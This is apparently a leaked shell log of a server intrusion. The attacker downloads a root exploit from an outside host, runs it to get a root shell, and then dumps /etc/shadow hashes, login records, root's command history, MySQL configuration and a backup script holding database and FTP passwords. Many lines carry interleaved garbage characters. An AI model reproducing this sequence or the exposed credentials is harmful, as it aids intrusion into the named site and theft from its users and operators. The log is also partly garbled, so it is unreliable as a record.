sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]( I# D1 L9 Y4 `% W5 o, @9 j  X2 r  A
–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]
/ c4 }8 L3 t: _' I) B$ `Resolving anti.sec.labs… 13.33.33.37) }6 X6 {0 Z8 B7 G
Connecting to anti.sec.labs|13.33.33.37|:80… connected.2 d/ J* O7 j& i) t. X
HTTP request sent, awaiting response… 200 OK+ K  u0 S$ a. E8 h4 W. E
Length: 18200 (18K) [text/plain]
# c7 a0 [& ~0 XSaving to: `g0troot’, Z  x3 _; E+ x7 C( R, W
8 j+ J4 a1 `4 H$ {
100%[=========================================================================================================================================>] 18,200      58.6K/s   in
1 O0 w' J9 h( }0.3s4 Z3 v# [+ U$ \* X! M1 {( `
. D3 ~1 I2 x3 c' f6 i/ D
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
- d2 Z9 @* p+ s( Q. |) I* }. |0 f1 A  `" `! f# K1 K) A7 e( A2 Z5 V
sh-3.2$ ./g0troot -i x86_64
0 S5 T: q* d9 }' D* i! h[+] g0troot - anti.sec.labs, t& G) L9 a) H5 u) }
[+] Target: 2.6.18-128.1.10.el5
; Z2 u6 R! S8 L/ _7 p5 i! c[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
  l$ N2 i: {! F- c) n: ^+ S$ D
[+] r00tr00t: e8 k$ C% a9 Y: W. H5 H# ?+ I
[~] Executing shell…( H; c. M" ?  z1 c) |) C; D( ^

" O5 ~1 B1 d) J& o' I( U# v# K7 B, Ush-3.2# id
; A8 t& X2 v. O2 u3 Duid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
; k2 [! B, N3 A2 r
7 [, _+ G6 p/ @7 F/ j! Ksh-3.2# cat /etc/shadow
& o+ Q% f9 k  t9 f5 u6 N# G2 a1 xroot1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::6 L, u0 X3 ^, E- W+ ?
[snip]
! y! P5 D; {# |  Z. Tadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::) {7 x) F+ f/ |4 h
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::# n# J% y$ B% r
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
, u6 s$ ~, S0 T8 Dastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
0 r& ]9 ?5 w, M( x( ]
% _5 A3 o: |( U. a8 ush-3.2# cat /etc/motd9 {- K" L2 k) T% {; ^/ }
#####################################################. {# p/ u9 e: {1 Z6 }1 y5 Q
#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #8 J7 k- L: k& e) t; X, @! ]
# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
+ ?, n  G) K3 a# B# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #
- e3 J1 d1 M6 A/ b#                                                   #6 A7 d; t+ j; G5 W: w
#####################################################8 X6 Z6 _9 h- L0 S  `
#                                                   #
! n; M7 l$ e0 e$ Q  X  ~! I# Admin Contact - 链接标记support@secureservertech.com      #. x2 O/ e) R. M3 Z: T2 I
#                                                   #
5 P+ C1 t0 y# H8 P' @# Available ShortCuts                               #
! m& n2 D2 |, m" a$ z  X#                                                   #/ a& ?  _  G& h' j" U% \5 I
# nst -  list active connections                    #3 H5 u- k& Y! v  m* L5 I& ~
# ddos - shows how many times each ip is connected  #5 A) j2 p4 R4 x1 X) Q+ R
# ltr -  restart the webserver                      #
* I6 s" y/ K8 e, u0 P9 b# phpc - edit the php config file                   #
9 q9 P) c0 x% T' k; W% G# htc -  edit the webserver configuration file      #
4 ?+ O$ K: x+ X5 y" E# up -   uptime                                     #& X3 U/ q* H: o3 e9 f
# etd - edit the motd of the day file               #, R2 W3 a2 V+ Z! C; N1 Y
# htr - start and restart apache if needed          #8 V/ [6 p! V1 E
# syng - shows active SYN_RECV connections          #0 Q" D' ^& ^, ]! ?  s: {8 o
# synd - syn flood blocker - “synd -h” for usage    #
, X2 ^) C$ i+ B4 k# O/ Z" t#####################################################
- P, x; K" z+ t, o# NOTES:                                            #/ ]2 a- z2 S3 l+ C+ J
# Last Upgrade - 12-08-2008 by JF                   #6 x5 B' P8 g. e$ {/ k
# My.cnf/Mysql Optimization - 1-28-09               #
9 f$ B0 {3 _3 V. ^, @$ S  n+ k#                                                   #4 D4 L, ]- U) p( j) r* ?3 n
#                                                   #7 y; A4 n6 x& j3 p* h+ I6 p
#                                                   #
2 @. e% z) P- i1 S4 r. B#####################################################
& z, h" u5 _: }
% \7 c, J% D0 Q4 C# t1 G' lsh-3.2# lastlog | grep -v Never9 _1 |& A2 w! E8 w6 ?
Username         Port     From             Latest
+ G9 C" Z  X! Vroot             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009. o+ Q3 _- w* _4 F
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008- w4 o2 s3 e' V5 P
com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
. j( |0 h, Y+ \6 V" A9 Eastanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009+ h! ]* ?, A/ h

" R9 i% m8 N0 ]8 Q1 p4 Ish-3.2# ls -la
: F" E* L. Y5 ^' \. d0 ltotal 453376
: X: U5 S0 n: Q$ U8 m! Sdrwxr-x— 15 root root       4096 Jun  4 08:40 .& x7 b- M1 _, w7 U
drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..: ^, [) M& [9 m  ?/ s
-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip
3 E# z0 w7 F& D# V% W6 P9 n' M" y-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
( a  \: y+ {& K, H-rw——-  1 root root      16836 Jun  4 07:21 .bash_history6 S% h  V; D! y# |* f/ p1 ?
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout3 V9 u* d; O( \( X% A) ^+ i
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile
# v4 m* i* f0 P0 d3 N" t# i! x-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
3 \" c) O5 ^# P- u9 y-rwx——  1 root root       1899 Oct 28  2007 bk.sh$ Q5 j+ N: F  c) f% S9 f" I; r( A
-rw-r–r–  1 root root       1327 Nov 29  2007 cert( W* ?2 s% I! W5 M+ }
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql/ M6 X! T7 D+ H* N; g* ?
drwxr-xr-x  4 root root       4096 May 20  2008 .cpan
6 i8 ~9 w  _7 _' i1 n9 y, i+ y/ u-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
; K) r$ j: ]$ j, @% L-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
8 u: m6 A/ T( }% V* |, }9 odrwx——  2 root root       4096 Oct 28  2007 .elinks
5 F4 a, @5 i& }; idrwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1: R- b$ F/ z. u# R+ s) J
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2/ e9 \6 v2 z. M: q  A
-rw——-  1 root root          0 Apr 16 13:19 .history. H: p& \5 _2 `5 k$ `
-rw-r–r–  1 root root      16095 Sep 11  2007 install.log# m% G' n; R. u6 O: J6 q, V5 W: @
-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog
& k% p* H3 d) q1 b* y0 M4 B-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
' N7 K$ E8 N! |8 w-rw——-  1 root root         35 Jun  2 14:23 .lesshst
, {2 C5 n, e- y7 M; Odrwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp% `! U4 I3 k) u$ p5 \0 ~  L3 l
drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec" Q' I$ c( x" e' F
-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
# f, e/ p, E- A-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2
% N3 |& ]% g  N, W8 F) z-rwx——  1 root root        760 Sep 18  2008 lp
2 |7 D! ]  L6 r1 j% s5 s' ~drwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.10 T* ^) M' ?" C' H0 Q! z  z4 b
-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz" l# A  Y: x& d1 l) \
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1" X  Q3 R5 G, p; e
drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.93 {* s/ g5 L% Y0 ?8 v
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
+ |% Q; m; ?+ Z7 |6 t5 }3 vdrwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3
, [% y* t& U1 ?! o+ ^$ ]-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
( X/ D/ o0 R) b2 X& l/ g-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh) h5 X% ^& [, _$ q  Y2 |( [6 B0 f* D( l
-rw——-  1 root root         41 Oct 19  2007 .my.cnf  z* j( W2 M) p# Q; [4 v2 L% n) j8 ~) U
-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history
' K$ w1 x+ x# e( ~-rwx——  1 root root      38873 Apr 16  2008 mysqlreport
* X- D6 C! c' x-rw——-  1 root root         41 May 20  2008 .mytop- g$ R8 l. D5 U) @  ~% l0 `
drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6. c0 i* T& o( B0 J
-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz" a9 ]! \; [# l2 b1 ]5 e
drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp
# @; F$ ]; \# W0 y-rw——-  1 root root       1462 Sep 21  2007 opt.php
  k% `' I! e% v4 q( H-rw-r–r–  1 root root       3371 Sep 22  2007 p
4 ]7 W7 I! p! s4 q1 ]-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
0 L) m7 x  s& U-rw——-  1 root root       1024 Feb  3 21:32 .rnd
4 R" \3 L1 e( ?- x6 Z7 _8 z-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
8 F# M! c( q. k3 M1 D/ E-rw-r–r–  1 root root        887 Nov 28  2007 server.key4 J, V. p3 n3 \, v, v8 \; y4 v
drwx——  2 root root       4096 Oct 10  2008 .ssh
. D- l( v9 S  ]( q9 _-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat- B) h' V+ V6 \8 D2 n# N
-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
) d; E, c. s1 h7 [' U. }& u-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip4 u" q/ X2 h1 x4 _6 f5 e8 P& Y
-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1
7 R4 B! b5 g9 Z0 ~- V- S5 {6 Mdrwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
# ~$ q4 G" ?4 K1 B" z: n-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh" @% C, |+ `* D4 w
drwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
& F5 \' W2 P& A-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2: W, C+ N0 {. P, B  X" q
-rw——-  1 root root      12997 May 16  2008 .viminfo0 u+ B0 _1 ]. B" A" n) W2 d& |

' B+ W% A& e0 rsh-3.2# cat .bash_history# u% Z) ~' i1 S( w
[snip]
1 N0 J* [% I3 x9 s& `* Z8 q/ Uwget cp4sst.com/sstlinux.tar.gz
8 s) ^8 c( _7 y# L4 i! @2 Ytar zxvf sstlinux.tar.gz" x" N, W7 T- M! `; r1 t
cd linux-2.6.27.10& M. `0 C/ j  D
sh install.sh
$ X+ q" a$ F1 V. nmake bzImage ; make modules ; make modules_install ; make install
: _9 U/ U  G$ emake clean
$ b% O4 i2 u+ m; w- @4 Aservice mysqld restart  s' `: v8 L2 R9 K; c! @
[snip]/ l% g) I7 m/ }, \+ k7 J2 N
cd /usr/sbin/
6 B* R* [5 R6 c9 H1 B+ S: x  `: L' g9 Mchmod 4777 traceroute3 R/ ^& T/ A( _. D
chmod 4777 ping: F; N# r5 P6 z$ [( s1 Q4 n' s7 d
traceroute -I 链接标记[url]www.astalavista.ch[/url]  x. x$ q+ B. ^( i5 d& Q2 Z
[snip]' I* H1 [" v, C  `2 _
vi /etc/csf/csf.conf5 d& r7 z* H) O4 ]' r
traceroute google.ch) T- X9 o/ m3 q
service csf restart: ^) P0 r% Q& w! n: ~" n2 ^9 m$ s  s
tracert google.ch2 @( g0 z; Q3 y6 e+ h2 t
service csf restart& E, C( P& ~/ @2 |* u8 G
traceroute 链接标记[url]www.google.ch[/url]# Q* r, X; z5 y2 f# y
tracert 链接标记[url]www.google.ch[/url]- P1 D5 n/ K. s
traceroute 链接标记[url]www.google.ch[/url]
' Q( C9 R3 X# _$ W& ?9 O% Slocate traceroute
% ^0 Q* z0 r6 _( _! O8 a! Kchown 4755 /bin/traceroute
3 F7 D! k- w, l/ e5 j$ s6 fchown 4777 /bin/traceroute
" ?3 H' {0 o2 S" olocate ping
$ w8 F7 b9 }  Mchown 4755 /bin/ping
6 d! ~  e& l9 T/ Y- z  rchown 4777 /bin/ping4 G: U8 u0 Q) ^  A  y" R7 j. }
cd /bin/1 Y4 O' x; D+ A( T6 p+ i
ls -ali | grep ping1 C' @7 J# [6 q9 Q2 Z
chown root ping
: a8 n" \* L: v" J3 ?chmod 4755 ping: V6 z9 N* D" A9 A  U8 k0 m
ls -ali | grep traceroute
% {: [/ w- t9 kchown root traceroute
! T1 P  q/ f9 }7 N* d4 y, _: G! nchmod 4755 traceroute
) f* U' [+ n. Q8 J1 Als -ali | grep traceroute) F& x! B$ a! ~1 t& M
traceroute -I 链接标记[url]www.google.ch[/url]
6 I, w6 c# c' {4 {; etraceroute 链接标记[url]www.google.ch[/url]' @! ?% N; q! h
whois pmsantos.ch' Z( i3 z$ T6 s
[snip]8 `( T5 d" M- ?9 k) j: w0 ~
mysql -h com_contrexx2_live < /root/defaultp_ports.sql4 F, s3 a2 h  M/ |! @
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
# q. c( o# @6 b1 a* [8 Z9 R: |( tmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
0 n! a% p5 S* K1 U5 amysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
. u2 S) B9 H! ctop
1 m& Z8 v% v& Y: s' F! Yping ssth.ch
& Y% W2 h8 V' U, [; vping asdlkfaljgasd???ljg???lasj.ch
7 B. F* j# t- c7 b7 i- q' nping asdlkfaljgasdlasj.ch% M# W' S; H& A/ @* g, C
ping 链接标记[url]www.ssth.ch[/url]8 R; {+ D( {! R+ f& J0 O" L( Q
ping ssth.ch% E9 x: u" y: }2 E
nslookup 链接标记[url]www.google.ch[/url]8 {- O+ g! ^. G$ x& k
nslookup 链接标记[url]www.ssth.ch[/url]6 H/ i) x5 K1 J' n9 Q1 E0 I
man nslookup
2 c0 A/ k5 A' l, }ping 链接标记[url]www.google.ch[/url]
# |& N) c1 r3 Snslookup 链接标记[url]www.google.ch[/url]
( q6 _9 C+ v( b  d# Snslookup 链接标记[url]www.google.ch[/url]
$ O: ~7 j0 p3 h7 _nslookup salfjasdlf.ch; I8 `5 q' u' E
[snip]
+ A! c. K* E7 e* l7 C" Z; Oopenssl passwd -1 sadf# f3 j5 P: L6 U5 V' ~- g  }, F
openssl passwd -1 5cZNHstdTy
0 Y6 L+ Y4 G. h8 o8 Q/ wmysql4 i$ R! ~+ B  L; j% P
mysql
; E) J* p$ n1 X4 wlocate proftp
) p% l  J% d( @6 Q* p' D+ f5 Z, Fvi /etc/proftpd.passwd
8 S) \/ H" Z8 L* H' }+ L5 Oservice proftpd restart
, U3 H6 ~! |* r% ]: z* L( @locate proftpd.conf- i! X. ~  @1 \5 t+ X: |: W
vi /etc/proftpd.conf! l( a" A' k9 P* [8 B
vi /etc/proftpd.passwd
4 e  t" n6 m3 Q' H; h; O9 ~6 ~7 R" xservice proftpd restart
' k% e3 {, p. b. C[snip]
' d2 }3 F3 j* V/bin/sh /home/com/backup_system/backup.sh
; `2 h3 j* J& O/ c: [$ q9 G0 c9 Ktar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin* z' Q+ j+ Q, k; d
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql+ U* o& v" ]& Q
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
8 h$ z2 y9 H9 {9 E) q2 |( gls -ali" F  x: S2 G) M( ?% o4 @4 F! e6 \
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
! `6 |8 |. f! j' Z3 C# z/ Jmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
8 u3 K' a7 {" l8 q: y  N) e  m" m1 Ccrontab -l/ V. F; n9 O; d2 r2 g& ?( l5 S
crontab -l
3 l- I8 |, z  Xphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
0 X- o' ?2 _$ f8 H" p, w/home/com/public_html/modifications/cronjobs/exploits.sh7 C( |' w9 F& r3 v) d4 C
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]- v- m3 C/ p4 G! y  }" P
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz8 S$ V/ A' Y% N0 R- N  D
cd lsws-4.0.38 `: ^2 o+ I& S! ?+ }' A& Z
sh install.sh
& ?) r7 a6 I  s9 Xuptime
# o/ u% M9 {7 i8 Y# ?6 ]hdparm -tt /dev/sda
$ C, C+ s# L+ Y3 Y, B& C& Viostat3 G/ B4 @, e. o- r% x6 D
yum install iostat1 }1 T* a) ?5 G
iostat- A/ R! u+ T& a; D- P) |9 t
whereis iostat8 [" O, M$ c6 o$ V: x6 N; ^
yjm clean all
# W9 f. k! i5 Y- Wyum clean all ; yum -y update
6 f' d4 k- S: H  Y" Siostat
9 U! G4 E9 P6 x8 a# L- zyum install systat' w! @0 k" a2 ~( i1 ^$ u2 b  V
rpm -qa | grep iostat
+ C' o) S" c) drpm -qa | grep sysstat
# S3 \' F, j' i, v1 z0 ~: Z. drpm -qa | grep systat, T0 P+ Q+ \( K" S0 s8 ^- R
dmesg -c4 {8 R! C8 R. ?  \1 X6 r
sysctl -p
' E0 T% N* u2 Xuname -r
  d' r& D2 l+ C7 l6 K9 {% Bcd /usr/src% K2 v' m) P8 `6 ^9 W  c
wget nix101.com/kernels/sstlinux.tar.gz: M" `6 ]7 V0 ?( |. T0 Q6 l- i
shutdown -r now- ~1 `  T: O/ P$ D, v
nano -w /boot/grub/grub.conf
# K* ^. B0 H, T; K! |
4 Y; `8 g% O# Xsh-3.2# cat .my.cnf
3 c8 g7 H) g( w- _[client]
  v. v- _3 _- n5 N& \, a' V. \9 t2 vuser=da_admin) L8 j0 W* c! K, j& O
password=X9dctmRH+ X& z: Z/ e4 w1 b- M3 o5 }
: [" \/ i. \# Z" {
sh-3.2# cat /home/com/backup_system/backup.sh' M% D3 ^% x1 l! K1 @# {
#!/bin/sh, q0 M: z/ k1 R; G5 k) w* Q
#####################################################################/ N. A+ l4 x" }0 C- i/ u% C
#                                                                   #
* X! }8 b) }* \# ~* [; Q#   incremental backup for astalavista.com                          #" ]3 A/ M; q% e4 y) x$ ?9 v  Z$ A% l
#                                                                   #
- Q5 p' e1 j6 C4 I$ G#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #/ V% G' L  H4 X9 W8 @7 r
#                                                                   #4 w( B# z3 O+ G& U1 r, Q, A. L1 L
#####################################################################
# B6 u5 X/ h3 \- O' H% A# w[snip]
0 W+ f* c0 x4 d4 i7 s+ J! DPROG_DIR=”/home/com/backup_system”;6 K+ n: z6 N+ h( b4 S0 I
BACKUP_DIR=”/home/com/backups”;+ d+ k$ l! d: q, A1 q
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;. o5 _# g, x9 e  T
# ftp for synology backup server
1 x# M+ U5 h3 K: |7 n# UFTP_HOST=”212.254.194.163″;) i) _! o9 s. U! o- C1 w
FTP_PORT=”21″;% z. [' E. k7 A
FTP_USER=”astalavista.com”;$ G/ |4 l8 M8 o  o
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
4 C$ }0 ^3 w7 h- q% sFTP_DIR=”/astalavista.com”;
1 X$ j* M- [! Y/ K# j# database
, ~1 I6 i9 q0 w+ R0 s4 qDB_HOST=”localhost”;
- p- P  }6 O+ x$ {: |0 O' dDB_USER=”contrexxuser2″;
5 k  a. e# P) Z" P5 oDB_PASS=”0fEYNZgXz1pKe”;
( |9 [2 ^. o3 q# k6 \" Y5 j# RDB_DATABASE1=”com_contrexx2_live”;) |% }$ P3 s6 n, a  W6 A; x
DB_DATABASE2=”com_contrexx2″;
9 X0 G$ S" l, D% c[snip]
% w, c# D) g, L6 Cftp -in $FTP_HOST $FTP_PORT <<EOF* L6 F$ j0 Y! g% i1 }
quote USER $FTP_USER, a- N  G/ N0 [# }/ T, c/ L- X
quote PASS $FTP_PASS3 R$ i) m. C; a4 K
cd $FTP_DIR" z* Q9 n6 ~; D& W! }: Y2 x
put $DB_FULLNAME-SQL_Dump.tar" o& d! }5 |3 T/ G
put $BACKUP_FULLNAME-Public_HTML.tar  u8 R! l4 Z" r7 D. G$ f. @3 U0 }
close
3 H+ g% ^; k  ybye
* F" n3 b4 ~* VEOF0 z# x- ]; Y9 I( `

2 \9 h8 n' }$ Y9 y" {6 Ash-3.2# cd /home
" [! |- x" k6 e. Msh-3.2# ls -la
3 e0 [8 F9 B( r& K1 ]  c( wtotal 120
, w# P1 ]4 Q: l  k- L# t9 udrwxr-xr-x 14 root    root     4096 Mar 11 17:56 .& d2 B4 \) [, p% K0 z  Z
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..9 A, J1 F6 i: h
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
# S% |2 a5 W2 Z! [2 s2 D+ {-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
$ t, b5 J+ o; u) ?; I" K-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user- @  h4 {0 g: ?6 j4 x" A' T* S
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
3 [$ v- Q9 w7 }8 k0 f& Udrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
8 e" h* T6 I& Y0 G# zdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.141614 J, a( s8 G% ^. K
drwx–x–x 10 com     com      4096 Apr 28 12:40 com: Y% q' r8 ^- A6 w8 L
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
* l8 o+ b. ^' w8 B4 i( e. wdrwx——  3 jon     jon      4096 Sep 21  2007 jon
3 d$ Y. a* _" S* \% Kdrwx——  2 root    root    16384 Sep 11  2007 lost+found
1 a4 p* V  T/ T" U7 m, Kdrwxr-xr-x  2 root    root     4096 Sep 14  2007 my" Q# u; i6 J7 [+ i7 w- s
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata! m' ^2 K! E9 p8 W: s$ o
drwx——  2 jon     jon      4096 Sep 15  2007 test! v+ E  ]* {/ K( ~0 S8 Y0 x" i# M3 X
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
6 d6 j+ P% F' L) @; K: B
3 `( w) u( C; G7 c+ Q2 b  \sh-3.2# cd admin4 z. z, o' S( J4 n4 d6 K6 T
sh-3.2# ls -la
" h9 v7 z' H/ w; Vtotal 1735896
& S7 i$ Z( @( K, tdrwx–x–x  9 admin admin       4096 Nov 28  2007 .
; {; d: j8 {  ~4 E9 e& _0 Q2 c# Sdrwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
, P& ]8 ?/ _9 Tdrwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups; `7 U2 C  P, z9 w; H' o& p: g: W
drwx——  2 admin admin       4096 Sep 28  2007 backups" q. _/ t: G# E
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history
8 p3 s" r4 o2 |1 C- Y3 p0 g  }-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout
" W4 ~/ x, p) _3 n7 [& d% a8 H-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile- e6 i% Q/ e) k; w
-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc  V9 a6 q' h/ E" |  f' h+ n' u
drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups9 ~9 o7 w; E& h# L0 Y) q/ k
drwx–x–x  6 admin admin       4096 Sep 21  2007 domains7 I3 S: I4 R4 h; a
drwxrwx—  3 admin mail        4096 Sep 21  2007 imap
! Z# `' C' b0 ^8 Y) G+ @-rw-r–r–  1 root  root          24 Sep 21  2007 info.php
/ D+ C3 a1 K3 ^8 Edrwx——  2 admin admin       4096 Sep 21  2007 mail
( {# U3 W% ?% M& I# ~- o0 I7 M-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr8 Y  h3 c1 d$ K; z& Y. i" v# h5 f, b
-rw-r–r–  1 root  root         887 Nov 28  2007 server.key) _( k# e: O$ o+ H) J
-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
& Y9 G) }/ e# J-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz" z' K1 p3 `$ U5 f" i0 Y) ^: ]
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups
1 ^8 W2 i, s+ E  g
) s9 ~+ ~& ~, ?& X: |2 O: N$ jsh-3.2# ..
& N4 |3 C' p3 {, T: ?7 Fsh-3.2# cd jon
1 F7 {3 Q, S" v9 h( ]) j* Zsh-3.2# ls -la
/ i5 c! z8 P8 W9 Ttotal 36
: ^1 M6 }/ Z) d: ?; Q% f& {+ Bdrwx——  3 jon  jon  4096 Sep 21  2007 .
6 q! e, w  Q' \& ?  z: E3 fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, R/ a, Y( s; S& f1 G4 ?-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history- h- U% l! T+ _0 T6 n; r, y0 O
-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout% @' k3 `/ w0 u4 n7 o/ U
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile
' y8 q- z7 z3 q$ c! q-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc' P8 b1 H: p5 K
-rw-r–r–  1 root root   24 Sep 21  2007 info.php# @* v1 _) q% Y) r* t
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html6 i7 g# M0 P" M. g* U0 K0 e6 E6 i# P

! E. m9 [. @1 t; n7 n. z% a1 Jsh-3.2# cd ..
, \8 @% Z: j1 B* H$ i  d1 Wsh-3.2# cd test
) ]9 i4 ?" o% Q) Esh-3.2# ls -la
1 b8 _7 T- R2 A7 dtotal 48& v5 d0 T1 J0 J, b4 L' o- k, f# ]* [9 A
drwx——  2 jon  jon  4096 Sep 15  2007 .
6 q* W3 p0 W4 Rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 ~6 t9 o+ Z* ?  o& J# c" u/ M-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history! I9 }: F8 r3 u/ W. A% U
-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout. \$ A$ @! W! I' e7 J* _" I
-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile
% Y6 c# p$ Q" i: M* i! m. G1 M-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
: Z' W: S7 Z8 z' N9 ush-3.2# cat .bash_history5 c2 n" e# N6 E6 T
/usr/bin/mysqladmin -u root password PoliuJhytg67
, L) `+ w! ~- Z/ |; s
; d6 B3 w  t  s$ y' wsh-3.2# cd ..( J( ^; e' E! a* }) s
sh-3.2# cd astanet
, _* l! c2 n% t) `. U/ Ish-3.2# ls -la( C6 U- G0 t3 J( \$ P/ z$ w; J
total 52* o8 m8 i' `5 h
drwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .
$ y4 N1 N: i- M% I# @drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
0 S9 z8 E1 R$ Wdrwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
) S, X, x& \7 ^; H8 o& U, y) b# X% `-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history) |# g' @. M' c6 j9 R4 Z, X0 U3 a
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout
, L4 n3 N" G$ e-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile
3 X1 B! ?: m9 j8 s8 Y-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
4 B7 f( b( H1 K: ]drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
